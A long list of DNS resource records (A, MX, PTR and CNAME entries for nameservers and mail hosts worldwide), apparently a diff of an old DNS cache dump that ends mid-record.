+DAVER.bungi.com. 604800 IN A 207.126.97.2 +DAVER.bungi.com. 604800 IN A 206.14.228.2 +gutenberg.bucksnet.com. 604800 IN A 207.113.15.5 +DNS2.IT.net. 604800 IN A 151.1.2.1 +NS2.SNS-UT.DEBIS.com. 604800 IN A 53.122.2.10 +ISI.EDU. 604800 IN A 128.9.176.32 +amethyst.xaos.org. 604800 IN A 204.145.159.12 +PAPPILLOMA.WWEBSVS.com. 604800 IN A 209.233.37.10 +NS2.bock.com. 604800 IN A 64.30.29.4 +NS2.OAR.net. 604800 IN A 192.88.195.10 +MINION.NETPOLICY.com. 604800 IN A 207.87.121.66 +Mail.catic1.com. 604800 IN A 207.190.204.103 +NS4.DNS.space.net. 604800 IN A 195.222.210.93 +b.gtld-servers.ORSC. 604800 IN A 216.13.126.116 +bend.madriver.com. 604800 IN A 207.136.232.15 +NS4.IS-FUN.net. 604800 IN A 212.162.54.34 +NS2.JPS.net. 604800 IN A 216.224.156.252 +NS1.IP-PLUS.net. 604800 IN A 164.128.36.34 +rush.cc1.RPSLMC.EDU. 604800 IN A 144.74.150.23 +NS2.GBMTECH.net. 604800 IN A 208.243.164.3 +DNS.MSEN.com. 604800 IN A 148.59.19.11 +DNSSEC2.SINGNET.COM.SG. 604800 IN A 195.13.10.226 +NS2.HOME.net. 604800 IN A 24.2.0.27 +ACCESS.MBNET.MB.CA. 604800 IN A 130.179.16.143 +DNS0.SPIN.AD.JP. 604800 IN A 165.76.0.98 +Filer.PHOTOTRUST.com. 604800 IN A 64.85.86.172 +jpl.NASA.GOV. 604800 IN A 137.78.160.180 +NS2.TECHNOLOGIA.net. 604800 IN A 207.253.59.4 +bparker.CONNACTIVITY.com. 604800 IN A 206.34.200.200 +NS1.uvm.EDU. 604800 IN A 132.198.201.10 +NS.SENET.net. 604800 IN A 206.155.163.195 +DNS2.UTCC.UTORONTO.CA. 604800 IN A 128.100.102.201 +localhost.costorf.com. 604800 IN A 127.0.0.1 +DNS2.AD. 604800 IN A 194.158.64.8 +HYDRA.HELSINKI.FI. 604800 IN A 128.214.4.29 +NAME.PHX.GBLX.net. 604800 IN A 206.165.6.10 +NS2.FOOL.com. 604800 IN A 208.51.76.222 +NS01-SERVER.CURINFO.AN. 604800 IN A 200.44.117.129 +NS.CR. 604800 IN A 163.178.8.2 +mail.pshift.net. 604800 IN A 208.153.85.30 +NS.IRD.FR. 604800 IN A 195.83.14.1 +NS.UZ. 604800 IN A 213.68.88.11 +DNS.INTELCOM.SM. 604800 IN A 194.183.64.11 +DNS2.UNIV-NKC.MR. 604800 IN A 193.251.145.154 +HNS3.hns.com. 604800 IN A 208.236.67.3 +bay.cs.UTORONTO.CA. 604800 IN A 128.100.1.1 +NS0.BT.net. 604800 IN A 194.72.6.51 +BAYONET.SJMERCURY.com. 604800 IN A 207.1.134.34 +PAN.BIJT.net. 604800 IN A 213.196.2.97 +NAVI.SUBTEND.net. 604800 IN A 208.186.117.224 +NS.CIX.CX. 604800 IN A 195.222.235.216 +waldorf.Informatik.Uni-Dortmund.de. 604800 IN A 129.217.4.42 +NS2.ivillage.com. 604800 IN A 209.185.162.16 +DNS.NIC.XLINK.net. 604800 IN A 193.141.40.42 +NS1.MERCHANTWARE.CON. 604800 IN A 209.170.142.34 +NS.TO.GD-ES.com. 604800 IN A 199.107.240.66 +NS-A.RNC.RO. 604800 IN A 192.162.16.31 +REGGAE.NCREN.net. 604800 IN A 128.109.131.3 +SSS-NL.DENIC.de. 604800 IN A 193.0.0.237 +NS1.TDC.TO. 604800 IN A 206.86.247.250 +NS.NIC.HU. 604800 IN A 193.6.27.62 +JOANNA.WILLIAM.org. 604800 IN A 195.153.6.2 +NS0.IIJ.AD.JP. 604800 IN A 202.232.2.34 +maus.spack.org. 604800 IN A 204.245.198.90 +B.NS.VERIO.net. 604800 IN A 129.250.35.32 +SECDNS.EUNET.BE. 604800 IN A 193.74.208.139 +NS3.EUROPE.YAHOO.com. 604800 IN A 217.12.4.71 +A.ROOT-SERVERS.net. 604800 IN A 198.41.0.4 +sherickpm.com. 604800 IN MX 10 inbound.sherickpm.com.criticalpath.net. +NS2.MEDIASERVICES.net. 604800 IN A 64.65.16.237 +YARDBIRD.CNS.vt.EDU. 604800 IN A 198.82.247.34 +SUNIC.SUNET.SE. 604800 IN A 192.36.125.2 +NS.MT. 604800 IN A 193.188.47.252 +CNDVG001.usa.net. 604800 IN A 165.212.12.1 +NS1.CX.ESCROW.IOCOMM.NET.CX. 604800 IN A 203.132.96.2 +DNS-02.NS.AOL.com. 604800 IN A 205.188.157.232 +ns2.tesserae.com. 604800 IN A 209.157.194.3 +SV10.BATELCO.COM.BH. 604800 IN A 193.188.124.227 +dec.anr.state.vt.us. 604800 IN MX 0 dec.anr.state.vt.us. +dec.anr.state.vt.us. 604800 IN MX 10 mx1.state.vt.us. +dec.anr.state.vt.us. 604800 IN MX 10 mx2.state.vt.us. +3.133.188.192.IN-ADDR.ARPA. 604800 IN PTR elektro.com. +NS1.LONDON.UK.NETDNS.com. 604800 IN A 212.62.6.38 +NS.NIC.MG. 604800 IN A 194.214.107.253 +DNS1.VN. 604800 IN A 203.162.3.235 +DENS20.DEN.nps.GOV. 604800 IN A 165.83.24.20 +z.ip6.INT. 604800 IN A 198.32.2.66 +NS3.TRIVALLEY.com. 604800 IN A 206.25.132.30 +isis.imag.FR. 604800 IN A 129.88.32.24 +NS.SOVAM.com. 604800 IN A 194.67.2.97 +NS-SOA.DARENET.DK. 604800 IN A 130.226.1.4 +NS4.NIC.TV. 604800 IN A 207.151.24.23 +DNSSRV1X.mitre.org. 604800 IN A 199.94.97.51 +GATEKEEPER.NYTIMES.com. 604800 IN A 199.181.175.201 +D.I-DNS.net. 604800 IN A 211.169.245.170 +NS.KOLO.net. 604800 IN A 209.66.103.20 +NS4.FIRSTWORLD.net. 604800 IN A 216.7.160.162 +DECST.CERIST.DZ. 604800 IN A 193.194.64.11 +NS4.DNS.WS. 604800 IN A 216.52.234.102 +NS0.GDGSC.com. 604800 IN A 192.160.62.66 +UCTHPX.UCT.AC.ZA. 604800 IN A 137.158.128.1 +NS2.HOTWIRED.com. 604800 IN A 209.185.151.6 +ns02.ca.us.ibm.net. 604800 IN A 165.87.201.243 +NS2.SPEAKEASY.net. 604800 IN A 216.231.41.22 +TELCOM.ZPTC.CO.ZW. 604800 IN A 194.133.122.47 +NS.DK-HOSTMASTER.DK. 604800 IN A 193.163.102.2 +NS.NIC.LK. 604800 IN A 192.248.1.65 +NS2.zama.net. 604800 IN A 203.142.130.5 +CZ.EUNET.CZ. 604800 IN A 193.85.3.130 +NS.AC.ID. 604800 IN A 202.159.124.34 +NS1.CUBE.de. 604800 IN A 212.162.54.243 +NS1.QUASAR.net. 604800 IN A 199.166.31.3 +NS1.OFFSHORE.AI. 604800 IN A 209.88.68.34 +NS5.NRSITE.com. 604800 IN A 208.178.169.4 +NS.AIC.net. 604800 IN A 195.250.64.65 +OWL.NCC.nps.GOV. 604800 IN A 165.83.34.60 +MAXIM.gbch.net. 604800 IN A 203.9.155.249 +BOW.INTNET.TD. 604800 IN A 193.251.147.253 +ns1.cacheware.com. 604800 IN A 64.221.210.242 +NS2.SPEEDHOST.com. 604800 IN A 216.42.31.169 +NS1.COMMIT.GM. 604800 IN A 63.77.152.177 +NAME.ROC.GBLX.net. 604800 IN A 209.130.187.10 +90.198.245.204.IN-ADDR.ARPA. 604800 IN PTR maus.spack.org. +BOLOGNA.NETTUNO.IT. 604800 IN A 193.43.2.5 +NIC.IBD.com. 604800 IN A 209.249.61.18 +NS.WESTOL.com. 604800 IN A 63.93.137.4 +time.SOVER.net. 604800 IN CNAME garnet.SOVER.net. +UNIX1.CS.UMASS.EDU. 604800 IN A 128.119.40.12 +AARDVARK.WR.UMIST.AC.UK. 604800 IN A 130.88.146.3 +AARDVARK.WR.UMIST.AC.UK. 604800 IN A 128.16.5.31 +NS1.NIC.YU. 604800 IN A 147.91.8.6 +mail.velco.com. 604800 IN A 198.136.217.106 +DNSAUTH2.SYS.GTEI.net. 604800 IN A 4.2.49.3 +NS.TELE.FI. 604800 IN A 193.210.19.19 +state.vt.us. 604800 IN MX 10 mx1.state.vt.us. +state.vt.us. 604800 IN MX 10 mx2.state.vt.us. +NS.NYC.juno.com. 604800 IN A 205.231.108.1 +NS1.g-world.com. 604800 IN A 216.26.39.10 +AUTH2.AMERICA.net. 604800 IN A 209.17.197.18 +KIRA.ECS.UMASS.EDU. 604800 IN A 128.119.91.10 +CONACYT.GOB.SV. 604800 IN A 168.243.64.2 +DNS.SRCE.HR. 604800 IN A 161.53.3.7 +NS00.ns0.com. 604800 IN A 216.92.60.60 +NS2.CL.BELLSOUTH.net. 604800 IN A 205.152.16.8 +jenner.med.HARVARD.EDU. 604800 IN A 134.174.141.2 +p2.cavebear.com. 604800 IN A 199.184.128.35 +NS1.NIC.JE. 604800 IN A 216.110.45.224 +ORCU.OR.BR.NP.ELS-GMS.att.net. 604800 IN A 199.191.129.139 +NS.XBILL.org. 604800 IN A 204.152.186.163 +WRAITH.CS.UOW.EDU.AU. 604800 IN A 130.130.64.1 +12.159.145.204.IN-ADDR.ARPA. 604800 IN PTR amethyst.xaos.org. +ns1.pr.SUN.com. 604800 IN A 192.18.16.2 +NS.SPIN.OMNES.net. 604800 IN A 192.23.90.196 +smtp.188.net. 604800 IN A 202.96.125.104 +TERMINAL.2GLOBE.net. 604800 IN A 195.178.183.230 +NS2.HARVARD.EDU. 604800 IN A 128.103.1.1 +NAMESERVER.CNR.IT. 604800 IN A 194.119.192.34 +EARTH.SY. 604800 IN A 195.22.198.6 +DNS2.REACCIUN.VE. 604800 IN A 150.188.4.212 +NS.TMX.COM.NI. 604800 IN A 205.218.253.2 +freefour.acs.rpi.EDU. 604800 IN A 128.113.24.91 +242.84.198.209.IN-ADDR.ARPA. 604800 IN PTR dlawren-gw.burl.sover.net. +CORREU.STA.AD. 604800 IN A 194.158.67.1 +NS.DRUKNET.NET.BT. 604800 IN A 202.144.128.200 +NS4.US.PRSERV.net. 604800 IN A 165.87.201.244 +KAASASSUK.GH.GL. 604800 IN A 194.177.232.3 +ECUA.NET.EC. 604800 IN A 157.100.1.2 +NS.CONCYT.GOB.GT. 604800 IN A 168.234.106.2 +NS2.NAP.net. 604800 IN A 206.54.224.1 +DNS2.CN.net. 604800 IN A 202.97.18.61 +MX.NSI.NASA.GOV. 604800 IN A 128.102.18.31 +NS.TDS.net. 604800 IN A 204.246.1.20 +tdns-me1.NETSCAPE.com. 604800 IN A 205.188.247.67 +NS2.METU.EDU.TR. 604800 IN A 144.122.199.93 +NS2.SETARNET.AW. 604800 IN A 206.48.100.11 +87.184.152.204.IN-ADDR.ARPA. 604800 IN PTR isrv3-i.isc.org. +DNS.OMNIWAY.SM. 604800 IN A 194.183.64.10 +NS0.U-NET.net. 604800 IN A 194.119.128.65 +elektro.CMHNET.org. 604800 IN A 192.188.133.3 +ns2.HIGGS.net. 604800 IN A 204.80.125.145 +NS2.SKYNETWEB.com. 604800 IN A 208.231.1.35 +MAGIC.MN. 604800 IN A 202.131.0.10 +NS1.YAHOO.com. 604800 IN A 204.71.200.33 +mx1.cdp.ADELPHIA.net. 604800 IN A 24.48.58.221 +SANTO.VANUATU.COM.VU. 604800 IN A 202.139.40.7 +www.mmuuf.org. 604800 IN MX 10 gro.dd.org. +ns1.timeheart.net. 604800 IN A 63.197.231.203 +NS2.TOGETHER.net. 604800 IN A 204.97.120.31 +NS.AMNIC.net. 604800 IN A 195.250.64.90 +NS.EENET.EE. 604800 IN A 193.40.56.245 +www.ONLINEPHOTOCONTEST.com. 604800 IN A 64.85.86.152 +VIC20.BLIPP.com. 604800 IN A 195.163.165.35 +DNS.FROGHOUSE.org. 604800 IN A 207.121.69.243 +NS2.ELI.net. 604800 IN A 207.173.86.2 +NS.CAIS.com. 604800 IN A 205.177.10.10 +BAABEN.AFRIQ.net. 604800 IN A 165.231.1.3 +NS2.NJ.EXODUS.net. 604800 IN A 209.1.10.234 +DOMREG.NIC.CH. 604800 IN A 130.59.1.80 +NS.EU.net. 604800 IN A 192.16.202.11 +NS1.DIEBOLD.net. 604800 IN A 65.196.80.10 +NS3.CP.net. 604800 IN A 209.228.14.4 +DNS.FUW.EDU.PL. 604800 IN A 193.0.80.11 +www.retro.com. 604800 IN A 205.179.181.195 +NS2.UNI2.net. 604800 IN A 195.82.195.99 +ns1.alcatrazmedia.com. 604800 IN A 167.160.132.2 +dns6.CP.MSFT.net. 604800 IN A 207.46.138.20 +NS1.SEYCHELLES.net. 604800 IN A 202.84.235.33 +NS2.INTERNIC.net. 604800 IN A 198.41.0.11 +front.macrosoft.WAW.PL. 604800 IN A 194.196.86.66 +NISC.JVNC.net. 604800 IN A 128.121.50.7 +AUTH03.NS.DE.UU.net. 604800 IN A 192.76.144.16 +BURDELL.CC.GATECH.EDU. 604800 IN A 130.207.3.207 +NS4.AH.net. 604800 IN A 203.21.205.20 +ns1.sgh-net.de. 604800 IN A 212.86.129.142 +Leland2.stanford.EDU. 604800 IN A 171.64.14.58 +CBRU.BR.NS.ELS-GMS.att.net. 604800 IN A 199.191.128.105 +DENEB.DOMAINNT.net. 604800 IN A 207.211.220.90 +ns1.ivm.net. 604800 IN A 62.204.1.1 +NS0.CWCI.net. 604800 IN A 194.6.79.162 +35.110.16.12.IN-ADDR.ARPA. 604800 IN CNAME 35.32/27.110.16.12.IN-ADDR.ARPA. +f.trns. 604800 IN A 209.133.38.16 +ODISEJ.TELEKOM.YU. 604800 IN A 195.178.32.2 +FRCU.EUN.EG. 604800 IN A 193.227.1.1 +NS.HHS.net. 604800 IN A 63.93.136.29 +FOO.GRNET.GR. 604800 IN A 194.177.210.211 +mail.WonderWorks.com. 604800 IN A 192.203.206.67 +NS1.IAFRICA.com. 604800 IN A 196.7.0.139 +NS.KACST.EDU.SA. 604800 IN A 212.26.44.3 +srs.state.vt.us. 604800 IN A 159.105.101.150 +OM4.OMANTEL.NET.OM. 604800 IN A 206.49.101.5 +Yeshua.Christ.com. 604800 IN A 207.54.4.5 +NS1.SIMORGH.com. 604800 IN A 209.1.163.10 +OLKETA.SOLOMON.COM.SB. 604800 IN A 202.139.42.4 +BANBA.DOMAINREGISTRY.IE. 604800 IN A 193.1.142.2 +NOC.IOS.com. 604800 IN A 198.4.75.69 +ns.schnism.net. 604800 IN A 195.88.150.3 +e4.ny.us.IBM.com. 604800 IN A 32.97.182.104 +DNS2.SEANET.com. 604800 IN A 199.181.164.2 +doubt.dd.org. 604800 IN A 209.198.103.193 +AMBER.ELEKTRON.PL. 604800 IN A 195.117.6.10 +gw.rge.com. 604800 IN A 157.225.178.11 +NS2.ZTNET.com. 604800 IN A 63.211.17.252 +NS3.INFI.net. 604800 IN A 205.219.239.5 +ZA.AKADNS.net. 604800 IN A 209.185.188.39 +ESTIA.CSI.FORTH.GR. 604800 IN A 139.91.191.3 +vtagr04.agr.state.vt.us. 604800 IN A 159.105.50.4 +NS1-PUBLIC.ZTX.COMPAQ.com. 604800 IN A 161.114.1.204 +ADMII.ARL.MIL. 604800 IN A 128.63.31.4 +ADMII.ARL.MIL. 604800 IN A 128.63.5.4 +NS.NIXU.FI. 604800 IN A 193.209.237.29 +DNS2.PIONEERNET.net. 604800 IN A 208.240.196.10 +NS.NIC.CL. 604800 IN A 146.83.4.11 +NS2.UTZ. 604800 IN A 160.124.112.10 +NS4.LUXNOC.com. 604800 IN A 195.206.104.201 +NS2.PBI.net. 604800 IN A 206.13.29.11 +annwfn.erfurt.thur.de. 604800 IN A 194.122.210.3 +NS1.MW.mediaone.net. 604800 IN A 24.131.1.8 +NS1.ISU.NET.SA. 604800 IN A 212.26.18.3 +pop.SHOREHAM.net. 604800 IN CNAME SHOREHAM.net. +DNS2.GUERNSEY.net. 604800 IN A 195.226.128.3 +NS1.BEACHSHORE.net. 604800 IN A 199.166.31.250 +HKUXB.HKU.HK. 604800 IN A 147.8.16.15 +NS.DOLEH.com. 604800 IN A 204.255.25.63 +NS.hactrn.net. 604800 IN A 216.254.68.12 +MALAKULA.BONDY.IRD.FR. 604800 IN A 193.50.53.1 +NS1.mediaone.net. 604800 IN A 24.128.1.80 +NS2.GPG.com. 604800 IN A 209.1.163.50 +noc.BelWue.de. 604800 IN A 129.143.2.1 +NS2.GIP.net. 604800 IN A 204.59.1.222 +RS.ISLES.net. 604800 IN A 212.100.224.90 +BOW.INTNET.GQ. 604800 IN A 195.101.152.253 +A.OPEN.BY. 604800 IN A 194.226.121.36 +us.i1.YIMG.com. 604800 IN CNAME a1.g.a.YIMG.com. +athome.wetlogic.net. 604800 IN CNAME c1059495-a.snvl1.sfba.home.com. +NS1.NIST.GOV. 604800 IN A 129.6.13.2 +mail.jerusalem-mail.com. 604800 IN A 216.251.232.93 +ISDSUN.cr.USGS.GOV. 604800 IN A 136.177.16.3 +NS.BOSTON.juno.com. 604800 IN A 64.136.25.53 +NS2.CADABRA.com. 604800 IN A 209.157.194.109 +nps.GOV. 604800 IN MX 10 ccmail2.itd.nps.GOV. +nps.GOV. 604800 IN MX 5 ccmail.itd.nps.GOV. +RELAY.HUJI.AC.IL. 604800 IN A 128.139.6.1 +styx.tahina.priv.at. 604800 IN A 194.152.163.253 +ISGATE.IS. 604800 IN A 193.4.58.51 +ns0.lux.dot-eu.org. 604800 IN A 195.206.105.102 +BILBO.NASK.ORG.PL. 604800 IN A 195.187.245.51 +BILBO.NASK.ORG.PL. 604800 IN A 148.81.16.51 +MAIL.TARSUS.com. 604800 IN A 208.130.9.252 +SUN.REDIRIS.ES. 604800 IN A 130.206.1.2 +NS2.NEASE.net. 604800 IN A 202.103.134.4 +OHCU.OH.MT.NP.ELS-GMS.att.net. 604800 IN A 199.191.144.75 +NS2.NF. 604800 IN A 203.12.249.101 +MIRAF-SERVER3.HONDUTEL.HN. 604800 IN A 206.48.104.142 +ns3.worldnet.att.net. 604800 IN A 204.127.160.1 +NS2.NETNAMES.net. 604800 IN A 212.53.77.28 +ITGBOX.IAT.CNR.IT. 604800 IN A 146.48.65.46 +NS2.ADELPHIA.net. 604800 IN A 24.48.62.35 +NS2.RIPN.net. 604800 IN A 195.209.0.6 +NS1.cinenet.net. 604800 IN A 198.147.76.65 +jengate.thur.de. 604800 IN A 193.174.15.34 +NOC.ULCC.JA.net. 604800 IN A 193.63.94.25 +NS.NOC.UZ. 604800 IN A 194.67.52.42 +NS0.JA.net. 604800 IN A 128.86.1.20 +NS0.JA.net. 604800 IN A 193.63.94.20 +NS2.INR.net. 604800 IN A 198.77.208.3 +netsage.org. 604800 IN A 209.67.235.38 +TERI.USP.AC.FJ. 604800 IN A 144.120.8.1 +NS2.NETSOL.com. 604800 IN A 198.17.208.71 +NS2.ABAC.com. 604800 IN A 216.55.144.4 +NS2.NIC.FR. 604800 IN A 192.93.0.4 +KANIN.ARNES.SI. 604800 IN A 193.2.1.66 +NS.EDU.GU. 604800 IN A 168.123.2.50 +DNS.INRIA.FR. 604800 IN A 193.51.208.13 +HEDNS1.GOOGLE.com. 604800 IN A 64.209.200.10 +asylum.sf.ca.us. 604800 IN A 192.48.232.17 +ACT2.ACT2000.net. 604800 IN A 207.42.132.227 +ICM1.ICP.net. 604800 IN A 192.94.207.66 +202.192.103.198.209.IN-ADDR.ARPA. 604800 IN PTR fraud.dd.org. +ECSEL.jhuapl.EDU. 604800 IN A 128.244.65.29 +NS2.DCNY.DOUBLECLICK.net. 604800 IN A 204.253.104.10 +keith.netsage.org. 604800 IN A 209.67.235.37 +MANTA.OUTREMER.com. 604800 IN A 213.16.1.106 +NS2.globalnetisp.net. 604800 IN A 207.136.213.2 +NS2.CCSRS.net. 604800 IN A 206.253.214.73 +NS1.NL.CONCENTRIC.com. 604800 IN A 195.18.114.5 +NS2.VI.net. 604800 IN A 212.78.64.10 +NS2.NEO.net. 604800 IN A 206.109.7.65 +cgi.MERCURYCENTER.com. 604800 IN CNAME vh80167.vh8.infi.net. +ORSTOM.RIO.net. 604800 IN A 192.33.151.1 +NS2.CONRADPROMOTIONS.com. 604800 IN A 208.24.118.203 +YARRINA.CONNECT.COM.AU. 604800 IN A 192.189.54.17 +dns03.OPS.usa.net. 604800 IN A 204.68.24.136 +APPSRV.HAITIWORLD.com. 604800 IN A 206.152.15.34 +NS.RELCOM.KZ. 604800 IN A 212.110.240.65 +NS1.MAGIC-MOMENTS.com. 604800 IN A 195.224.53.80 +NS.ALCATEL.com. 604800 IN A 192.160.6.91 +ns2.terra.net. 604800 IN A 199.103.128.2 +NS3.hotmail.com. 604800 IN A 209.185.130.68 +vtc.VSC.EDU. 604800 IN MX 0 eve.vtc.VSC.EDU. +www.vmba.org. 604800 IN MX 10 gro.dd.org. +NAHOURI.ONATEL.BF. 604800 IN A 206.82.130.195 +SERVER2.INFN.IT. 604800 IN A 131.154.1.3 +NS2.AI-R.com. 604800 IN A 66.33.4.51 +NS1.FREE.net. 604800 IN A 147.45.15.34 +vcmr-54.server.rpi.EDU. 604800 IN A 128.113.113.44 +haig.CS.UCL.AC.UK. 604800 IN A 128.16.6.8 +mail.nova-data.com. 604800 IN A 12.16.110.35 +MOEVAX.EDU.TW. 604800 IN A 140.111.1.2 +NS2.LTWCC.org. 604800 IN A 12.33.66.62 +NS.BA. 604800 IN A 195.130.35.5 +noc.HRZ.uni-bielefeld.de. 604800 IN A 129.70.5.16 +VANILLA.WRO.nps.GOV. 604800 IN A 165.83.71.3 +NS2.SZTAKI.HU. 604800 IN A 193.225.86.1 +SECIU.EDU.UY. 604800 IN A 164.73.128.5 +COL2.CARIBSURF.com. 604800 IN A 205.214.192.202 +NS2.QATAR.NET.QA. 604800 IN A 212.77.192.13 +NS2.E-SYNC.net. 604800 IN A 192.206.57.128 +ns1.eu.SUN.com. 604800 IN A 192.18.240.8 +NS1.UUSJ.DOUBLECLICK.net. 604800 IN A 204.176.177.10 +NS2.CUHK.EDU.HK. 604800 IN A 137.189.6.21 +NS1.MEITCA.com. 604800 IN A 137.203.5.1 +NS2.DSL.net. 604800 IN A 209.87.79.232 +techfac.techfak.uni-bielefeld.de. 604800 IN A 129.70.132.100 +listserv.performancediver.com. 604800 IN A 216.34.185.155 +foolusmf.D4P.net. 604800 IN CNAME a100.g.akamai.net. +pedic-med.vrx.net. 604800 IN A 199.166.24.2 +GRUMPY.NET.NA. 604800 IN A 196.20.23.1 +BK.tifosi.com. 604800 IN A 208.58.189.13 +ns3.PAIR.com. 604800 IN A 209.68.1.15 +ns2.ar.com. 604800 IN A 64.124.80.42 +MASSIRA.ONPT.NET.MA. 604800 IN A 206.103.26.1 +NS.KBFI.EE. 604800 IN A 192.121.251.13 +ns3.Algebra.com. 604800 IN A 216.254.54.22 +faerber.muc.de. 604800 IN MX 10 slarti.muc.de. +9.206.203.192.IN-ADDR.ARPA. 604800 IN PTR ice.WonderWorks.COM. +PUKU.UNZA.ZM. 604800 IN A 196.7.240.1 +ATLNET.ATLONLINE.com. 604800 IN A 207.153.72.193 +Z1.NS.NYC1.GLOBIX.net. 604800 IN A 209.10.66.55 +www.hometownbands.com. 604800 IN A 209.67.235.38 +SIMON.CS.CORNELL.EDU. 604800 IN A 128.84.154.10 +EKEKO.RCPIP.net. 604800 IN A 209.45.127.2 +emerald.itnet.com.PL. 604800 IN A 195.116.64.3 +DNS1.ICS.FORTH.GR. 604800 IN A 139.91.151.70 +NS.ATL.BELLSOUTH.net. 604800 IN A 205.152.0.20 +ntp.ctr.COLUMBIA.EDU. 604800 IN CNAME sirius.ctr.COLUMBIA.EDU. +NS2.GLOBECOMM.net. 604800 IN A 165.251.1.3 +UUNS1DNS1.FLONETWORK.com. 604800 IN A 209.167.79.5 +GRIN.GNOSH.net. 604800 IN A 216.15.87.207 +NS.DIGSYS.BG. 604800 IN A 192.92.129.1 +uunet.UU.net. 604800 IN MX 10 Mail.UU.net. +ns1.vermontel.com. 604800 IN A 204.164.106.2 +NS2.GREENMOUNTAINACCESS.net. 604800 IN A 208.144.252.31 +38.241.5.198.IN-ADDR.ARPA. 604800 IN PTR cmr0.ash.ops.us.uu.net. +NS1.NIC.UK. 604800 IN A 195.66.240.130 +DNS.FCCN.PT. 604800 IN A 193.136.192.10 +NS2.NIC.TJ. 604800 IN A 209.77.224.1 +NS4.NEWACCOUNT.com. 604800 IN A 209.78.16.6 +NS2.IHUG.NET.NZ. 604800 IN A 203.29.160.2 +NS.SIGNALZ.com. 604800 IN A 209.67.230.71 +DNS.NIC.AD. 604800 IN A 194.158.67.251 +3.2.39.137.IN-ADDR.ARPA. 604800 IN PTR New-York4.NY.ALTER.NET. +UUCP-GW-2.PA.DEC.com. 604800 IN A 16.1.0.19 +NS.LANDLORDS.com. 604800 IN A 63.64.164.68 +NS2.EXODUS.net. 604800 IN A 207.82.198.150 +NS2.SCRUZ.net. 604800 IN A 165.227.2.10 +NS.PIPEX-SZ.net. 604800 IN A 196.15.232.19 +saturn.SUN.com. 604800 IN A 192.9.25.2 +e24.nc.us.IBM.com. 604800 IN A 32.97.136.230 +NMS.CYFRONET.KRAKOW.PL. 604800 IN A 149.156.1.3 +NS.TWNIC.net. 604800 IN A 192.83.166.11 +ns2.alcatel.NO. 604800 IN A 193.213.238.2 +INPAKSODNS.AKSO.nps.GOV. 604800 IN A 165.83.49.9 +mail.reptiles.org. 604800 IN A 198.96.117.157 +59.187.152.204.IN-ADDR.ARPA. 604800 IN PTR shell.nominum.com. +ns1.mobydark.com. 604800 IN A 216.13.76.21 +NS.KG. 604800 IN A 195.38.160.36 +NS.SPB.SU. 604800 IN A 193.124.83.69 +PENDRAGON.CS.PURDUE.EDU. 604800 IN A 128.10.2.5 +NS1.IGC.APC.org. 604800 IN A 192.82.108.38 +USDNS.NIC.us. 604800 IN A 198.41.3.87 +NS2.WEBTRENDS.com. 604800 IN A 63.88.212.11 +URANUS.DAIMI.AAU.DK. 604800 IN A 130.225.16.40 +ANTANA.IRD.MG. 604800 IN A 194.214.107.1 +NS.JERSEY.juno.com. 604800 IN A 64.136.17.178 +NS2.INTERNET-TOOLS.com. 604800 IN A 206.109.113.140 +ns-tk012.ocn.AD.JP. 604800 IN A 203.139.160.74 +bvt-ext.gdarm.com. 604800 IN A 166.19.32.42 +NS1.ID. 604800 IN A 202.155.30.227 +NS2.MAHNET.net. 604800 IN A 207.219.173.132 +NS.ALCANET.COM.AU. 604800 IN A 203.62.196.10 +UTAMA.BOLNET.BO. 604800 IN A 166.114.1.40 +NS.CNC.AC.CN. 604800 IN A 159.226.1.1 +NS.KREN.NE.KR. 604800 IN A 147.47.1.1 +NS1.REDHAT.com. 604800 IN A 216.148.218.250 +db.rc.VIX.com. 604800 IN A 204.152.187.21 +198.103.198.209.IN-ADDR.ARPA. 604800 IN CNAME 198.192.103.198.209.IN-ADDR.ARPA. +alf.pbks.PL. 604800 IN A 195.205.33.200 +FLAG.EP.net. 604800 IN A 198.32.4.13 +DNS2.IUNET.IT. 604800 IN A 192.106.1.31 +NS2.QUANTIFIED.net. 604800 IN A 63.212.171.3 +INTERNET-SERVER.ZURICH.IBM.com. 604800 IN A 195.212.119.252 +seaipsvcs.idx.com. 604800 IN A 172.22.64.42 +lebanon.valley.net. 604800 IN A 198.115.160.16 +SERVER.NORDU.net. 604800 IN A 193.10.252.19 +NS.NIC.DO. 604800 IN A 207.176.16.50 +isc-01.iscvt.org. 604800 IN A 207.136.209.131 +NAC.NO. 604800 IN A 129.240.2.40 +SAVA.UTIC.NET.BA. 604800 IN A 195.130.35.3 +NS1.TOKYO.JP.NETDNS.com. 604800 IN A 64.56.164.118 +NETSERV2.ITS.rpi.EDU. 604800 IN A 128.113.1.3 +IFI.UIO.NO. 604800 IN A 129.240.64.2 +www.TOAPLAN.com. 604800 IN A 216.42.31.169 +ns2.the-frontier.org. 604800 IN A 216.86.199.115 +NS.UNAM.MX. 604800 IN A 132.248.253.1 +ARISTO.TAU.AC.IL. 604800 IN A 132.66.32.10 +DNS.CS.WISC.EDU. 604800 IN A 128.105.2.10 +NS1.NIC.IR. 604800 IN A 194.225.70.83 +NS1.RETINA.AR. 604800 IN A 200.10.202.3 +mailer.connriver.net. 604800 IN A 63.93.137.13 +NS.ATI.TN. 604800 IN A 193.95.66.10 +NS2.CLEAR.NET.NZ. 604800 IN A 203.97.37.14 +NS4.EARTHLINK.net. 604800 IN A 209.179.179.19 +mejac.palo-alto.ca.us. 604800 IN A 192.147.236.1 +New-York4.NY.ALTER.net. 604800 IN A 137.39.2.3 +New-York4.NY.ALTER.net. 604800 IN A 137.39.126.10 +falcon.tallship.net. 604800 IN A 208.179.112.2 +ZEUS.CC.UCY.AC.CY. 604800 IN A 194.42.1.1 +NS2.SECURE.net. 604800 IN A 161.58.9.10 +NS0.FLIRBLE.org. 604800 IN A 195.40.6.20 +dns.zenon.net. 604800 IN A 195.2.83.107 +SERVIDOR.MICROASTUR.ES. 604800 IN A 195.76.178.5 +DOWNSTAGE.MCS.VUW.AC.NZ. 604800 IN A 130.195.6.10 +ns2.GNAC.com. 604800 IN A 209.182.195.77 +PRIFI.EUNET.FI. 604800 IN A 193.66.1.146 +ns2.k12.vt.us. 604800 IN A 170.222.64.130 +ns2.nic.mnet. 604800 IN A 208.109.83.110 +NS0.PIPEX.net. 604800 IN A 158.43.128.8 +NS1.SANFRANCISCO.US.NETDNS.com. 604800 IN A 207.82.50.166 +AMRA.NIC.GOV.JO. 604800 IN A 193.188.66.103 +kw.com.CN. 604800 IN MX 15 mail2.kw.com.CN. +SHNS.163.net. 604800 IN A 61.129.65.108 +NS.ER.USGS.GOV. 604800 IN A 130.11.48.2 +FAITH.MYNET.net. 604800 IN A 207.13.11.2 +mail.smuggs.com. 604800 IN A 209.67.230.71 +MIMOS.MY. 604800 